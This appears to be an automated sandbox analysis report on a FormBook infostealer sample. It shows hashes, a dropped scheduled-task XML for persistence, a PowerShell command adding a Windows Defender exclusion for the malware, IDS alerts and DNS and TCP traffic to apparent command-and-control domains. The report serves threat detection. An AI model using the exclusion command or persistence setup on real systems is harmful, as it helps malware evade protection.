                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1
                                                                                                      Process:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1598
                                                                                                      Entropy (8bit):5.1439090161906
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaX5xvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTivv
                                                                                                      MD5:BB9A391C3FC862B873BE57126F43023A
                                                                                                      SHA1:7C8FCB74AB71109806F8DC898205988205AC599C
                                                                                                      SHA-256:BC7496050B45F9AFEAC4A3197FEB044287FFBA3FCF2627DB958FE701CC8C0AF3
                                                                                                      SHA-512:09E37C24F320D92D652072FB744CFAF46C113D65E179D4A14296D56729815D7CCB4EE71AF94801CE51D681C81C8C5DCE1750CC850ED421814FE3893651EFF2DF
                                                                                                      Malicious:true
                                                                                                      Reputation:unknown
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                                                      Process:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):731648
                                                                                                      Entropy (8bit):7.625561793309267
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
                                                                                                      MD5:F7ECD12D134AAF3541396C78337CE672
                                                                                                      SHA1:BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
                                                                                                      SHA-256:EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
                                                                                                      SHA-512:EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 20%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......*F.(........(.....**..(......*....(......*....(......*..{....*"..}....*&.(......*F.(........(.....**..(......*....(......*....(......*..0...........(.....o......o.....+..*.0...........(.....o......o.....+..*.0...........(.....o.......o.....+..*....0...........(.....o.......o.....+..*....0.. ........(.....o.......o......o$....+..*.0.. ........(.....o.......o......o$....+..*.(....o....*.(....o....*
                                                                                                      Process:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Reputation:unknown
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5793
                                                                                                      Entropy (8bit):5.4054745940790925
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:BZQAjfN/qDo1Z5ZxjfN/qDo1Zm7xjjZ8jfN/qDo1ZiWzzNZa:0t
                                                                                                      MD5:73CEC78D744EB0750820765761E7ACC7
                                                                                                      SHA1:5F2D5D6A88E3DB9FE65F51DE6C6DE7089A6CE639
                                                                                                      SHA-256:F7C865F08C0D6F50B6E194B0B533B58BA793FE0F2DAD8758089E3DA2FCF02E5B
                                                                                                      SHA-512:94DBB6640B4214CD07FB7D8CDF0E3A34F9C92CCD6721E7BE6268A3152027581BB6150C0BCEF6EB2D3E76E427A1DDDDF33C66E8600517646BB8529CE268127B7B
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220514152856..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe..Process ID: 6568..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220514152856..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe..**********************..Windows PowerShell transcript start..Start time: 20220514153248..Username: computer\user..RunAs User: computer\jo
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.625561793309267
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:iuvRyl9i7D.exe
                                                                                                      File size:731648
                                                                                                      MD5:f7ecd12d134aaf3541396c78337ce672
                                                                                                      SHA1:bb41a84d4f5eef537e41cf4bde375c99bff86a04
                                                                                                      SHA256:ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
                                                                                                      SHA512:ef70eb852b370e5f29ca4d27584a3faad34a629c857e135f434b21e483c24fc813fe97fff77eb73dae428fd3e97fb82c3564eae03a18d8bfd0f1a71ba3c9f77a
                                                                                                      SSDEEP:12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
                                                                                                      TLSH:80F4E05133FC5F09D27AE3F99670115087B57A3A59AAE38E0CC130EE1EA1F409752B67
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@................................
                                                                                                      Icon Hash:00828e8e8686b000
                                                                                                      Entrypoint:0x4b3f0a
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x627F674F [Sat May 14 08:24:47 2022 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb3eb80x4f.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x5c4.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xb1f100xb2000False0.804240366046data7.63421102824IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xb40000x5c40x600False0.426432291667data4.12651677638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xb60000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_VERSION0xb40900x334data
                                                                                                      RT_MANIFEST0xb43d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain
                                                                                                      DescriptionData
                                                                                                      Translation0x0000 0x04b0
                                                                                                      LegalCopyrightCopyright 2016
                                                                                                      Assembly Version1.0.0.0
                                                                                                      InternalNameSecurityContextRunD.exe
                                                                                                      FileVersion1.0.0.0
                                                                                                      CompanyName
                                                                                                      LegalTrademarks
                                                                                                      Comments
                                                                                                      ProductNameView
                                                                                                      ProductVersion1.0.0.0
                                                                                                      FileDescriptionView
                                                                                                      OriginalFilenameSecurityContextRunD.exe
                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      192.168.2.435.209.127.15549776802031449 05/14/22-15:30:16.775228TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.435.209.127.155
                                                                                                      192.168.2.435.209.127.15549776802031453 05/14/22-15:30:16.775228TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.435.209.127.155
                                                                                                      192.168.2.435.209.127.15549776802031412 05/14/22-15:30:16.775228TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.435.209.127.155
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 14, 2022 15:30:03.781282902 CEST4976880192.168.2.45.183.8.183
                                                                                                      May 14, 2022 15:30:03.920614958 CEST80497685.183.8.183192.168.2.4
                                                                                                      May 14, 2022 15:30:03.920727968 CEST4976880192.168.2.45.183.8.183
                                                                                                      May 14, 2022 15:30:03.920893908 CEST4976880192.168.2.45.183.8.183
                                                                                                      May 14, 2022 15:30:04.060039997 CEST80497685.183.8.183192.168.2.4
                                                                                                      May 14, 2022 15:30:04.548072100 CEST80497685.183.8.183192.168.2.4
                                                                                                      May 14, 2022 15:30:04.548129082 CEST80497685.183.8.183192.168.2.4
                                                                                                      May 14, 2022 15:30:04.548218966 CEST4976880192.168.2.45.183.8.183
                                                                                                      May 14, 2022 15:30:06.312325001 CEST4976880192.168.2.45.183.8.183
                                                                                                      May 14, 2022 15:30:06.451627970 CEST80497685.183.8.183192.168.2.4
                                                                                                      May 14, 2022 15:30:16.363326073 CEST4977480192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.494345903 CEST804977435.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.494873047 CEST4977480192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.495182991 CEST4977480192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.495271921 CEST4977480192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.504599094 CEST4977580192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.626019955 CEST804977435.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.634051085 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.636746883 CEST804977435.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.636895895 CEST4977480192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.637161970 CEST4977580192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.643537998 CEST4977580192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.643937111 CEST4977680192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.773243904 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.773293018 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.773320913 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.773431063 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.773549080 CEST4977580192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.773643017 CEST4977580192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.774919033 CEST804977635.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.775083065 CEST4977680192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.775228024 CEST4977680192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:16.903151035 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.903198957 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.903225899 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.903496981 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.903522968 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.903654099 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.905946970 CEST804977635.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:16.913714886 CEST804977535.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:17.289189100 CEST4977680192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:17.460618973 CEST804977635.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:18.098143101 CEST804977635.209.127.155192.168.2.4
                                                                                                      May 14, 2022 15:30:18.098318100 CEST4977680192.168.2.435.209.127.155
                                                                                                      May 14, 2022 15:30:22.373779058 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.546669006 CEST8049778198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.546772957 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.546966076 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.547004938 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.547489882 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.719687939 CEST8049778198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.719718933 CEST8049778198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.719736099 CEST8049778198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.719750881 CEST8049778198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.719788074 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.719824076 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.719893932 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.719924927 CEST4977880192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.719986916 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.721510887 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.721914053 CEST4978080192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.894175053 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.894232035 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.894263029 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.894292116 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.894321918 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.894367933 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.894377947 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.894489050 CEST8049780198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:22.894987106 CEST4978080192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:22.895159960 CEST4978080192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:23.067143917 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:23.067190886 CEST8049779198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:23.067257881 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:23.067307949 CEST4977980192.168.2.4198.54.117.216
                                                                                                      May 14, 2022 15:30:23.067642927 CEST8049780198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:23.067675114 CEST8049780198.54.117.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.467868090 CEST4978180192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.483691931 CEST804978135.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.483841896 CEST4978180192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.487941027 CEST4978180192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.488051891 CEST4978180192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.488487959 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.504026890 CEST804978135.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.504388094 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.504643917 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.506386995 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.508757114 CEST804978135.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.514334917 CEST4978380192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.522336006 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522372961 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522399902 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522424936 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522442102 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.522453070 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522481918 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522483110 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.522496939 CEST4978280192.168.2.435.241.47.216
                                                                                                      May 14, 2022 15:30:28.522506952 CEST804978235.241.47.216192.168.2.4
                                                                                                      May 14, 2022 15:30:28.522509098 CEST4978280192.168.2.435.241.47.216
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 14, 2022 15:30:03.737236977 CEST6075853192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:03.772979021 CEST53607588.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:16.340459108 CEST6490953192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:16.361342907 CEST53649098.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:22.352449894 CEST6038153192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:22.372586966 CEST53603818.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:28.201328039 CEST5650953192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:28.466856956 CEST53565098.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:33.866899014 CEST5406953192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:33.885291100 CEST53540698.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:39.638600111 CEST5817153192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:39.960573912 CEST53581718.8.8.8192.168.2.4
                                                                                                      May 14, 2022 15:30:45.995723963 CEST5643753192.168.2.48.8.8.8
                                                                                                      May 14, 2022 15:30:46.054826021 CEST53564378.8.8.8192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      May 14, 2022 15:30:03.737236977 CEST192.168.2.48.8.8.80xf68bStandard query (0)www.dems-clicks.comA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:16.340459108 CEST192.168.2.48.8.8.80x6722Standard query (0)www.jamesreadtanusa.comA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.352449894 CEST192.168.2.48.8.8.80x1c1bStandard query (0)www.kickball.siteA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:28.201328039 CEST192.168.2.48.8.8.80x622eStandard query (0)www.bldh45.xyzA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:33.866899014 CEST192.168.2.48.8.8.80x91ebStandard query (0)www.properscooter.comA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:39.638600111 CEST192.168.2.48.8.8.80x5730Standard query (0)www.uspplongee.comA (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:45.995723963 CEST192.168.2.48.8.8.80x304cStandard query (0)www.zeavd.comA (IP address)IN (0x0001)
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      May 14, 2022 15:30:03.772979021 CEST8.8.8.8192.168.2.40xf68bNo error (0)www.dems-clicks.com5.183.8.183A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:16.361342907 CEST8.8.8.8192.168.2.40x6722No error (0)www.jamesreadtanusa.com35.209.127.155A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)www.kickball.siteparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
